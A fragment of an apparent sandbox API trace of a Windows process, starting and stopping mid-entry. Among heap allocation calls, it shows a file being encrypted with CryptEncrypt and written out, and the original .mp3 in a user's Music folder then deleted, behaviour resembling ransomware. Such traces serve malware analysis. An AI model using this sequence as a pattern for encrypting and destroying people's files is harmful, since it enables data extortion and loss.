hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0118.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0118.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0118.152] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.152] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.158] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.158] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.158] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca988, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0118.158] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xee2a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xee30) returned 1 [0118.158] CharLowerBuffW (in: lpsz="byte[60977]", cchLength=0xb | out: lpsz="byte[60977]") returned 0xb [0118.159] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.159] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0118.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0118.159] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144e538*=0xee2a, dwBufLen=0xee30 | out: pbData=0x499a008*, pdwDataLen=0x144e538*=0xee30) returned 1 [0118.159] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.159] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.159] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.161] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0xee30, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0xee30, lpOverlapped=0x0) returned 1 [0118.163] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0118.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca598, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0118.163] CryptDestroyKey (hKey=0x41ac600) returned 1 [0118.163] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.163] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.163] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.163] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0118.163] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0118.163] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.163] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.163] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.163] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0118.164] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0118.164] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.164] FreeLibrary (hLibModule=0x756e0000) returned 1 [0118.164] CloseHandle (hObject=0x298) returned 1 [0118.164] CloseHandle (hObject=0x258) returned 1 [0118.167] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\vgfSxUhhzUZpNrrLJ3hR.mp3", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\tG2O\\vgfSxUhhzUZpNrrLJ3hR.mp3", lpFilePart=0x0) returned 0x33 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d8c0 [0118.168] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\vgfSxUhhzUZpNrrLJ3hR.mp3" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\vgfsxuhhzuzpnrrlj3hr.mp3")) returned 0x20 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fb0 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dcf8 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0118.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0118.168] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\vgfSxUhhzUZpNrrLJ3hR.mp3", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d50a20, ftCreationTime.dwHighDateTime=0x1d5e269, ftLastAccessTime.dwLowDateTime=0x90642aa0, ftLastAccessTime.dwHighDateTime=0x1d5ec9a, ftLastWriteTime.dwLowDateTime=0x90642aa0, ftLastWriteTime.dwHighDateTime=0x1d5ec9a, nFileSizeHigh=0x0, nFileSizeLow=0xee2a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="vgfSxUhhzUZpNrrLJ3hR.mp3", cAlternateFileName="VGFSXU~1.MP3")) returned 0x41ac2c0 [0118.168] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\vgfSxUhhzUZpNrrLJ3hR.mp3" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\vgfsxuhhzuzpnrrlj3hr.mp3")) returned 1 [0118.189] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d50a20, ftCreationTime.dwHighDateTime=0x1d5e269, ftLastAccessTime.dwLowDateTime=0x90642aa0, ftLastAccessTime.dwHighDateTime=0x1d5ec9a, ftLastWriteTime.dwLowDateTime=0x90642aa0, ftLastWriteTime.dwHighDateTime=0x1d5ec9a, nFileSizeHigh=0x0, nFileSizeLow=0xee2a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="vgfSxUhhzUZpNrrLJ3hR.mp3", cAlternateFileName="VGFSXU~1.MP3")) returned 0 [0118.189] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d8c0 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0118.189] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0118.189] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0118.189] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0118.190] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0118.190] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0118.190] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0118.190] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e00 | out: hHeap=0x1780000) returned 1 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23d0 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0118.190] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23e0 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0118.190] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0118.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0118.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0b8 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0118.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f98 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fb0 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0118.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0118.191] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0118.191] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0118.192] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0118.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0118.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0118.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0118.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0118.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0118.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0118.192] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0118.192] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0118.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0118.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0118.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0118.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0118.193] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0118.193] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0118.193] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0118.193] HeapFree (in: hHeap=0x1780000, 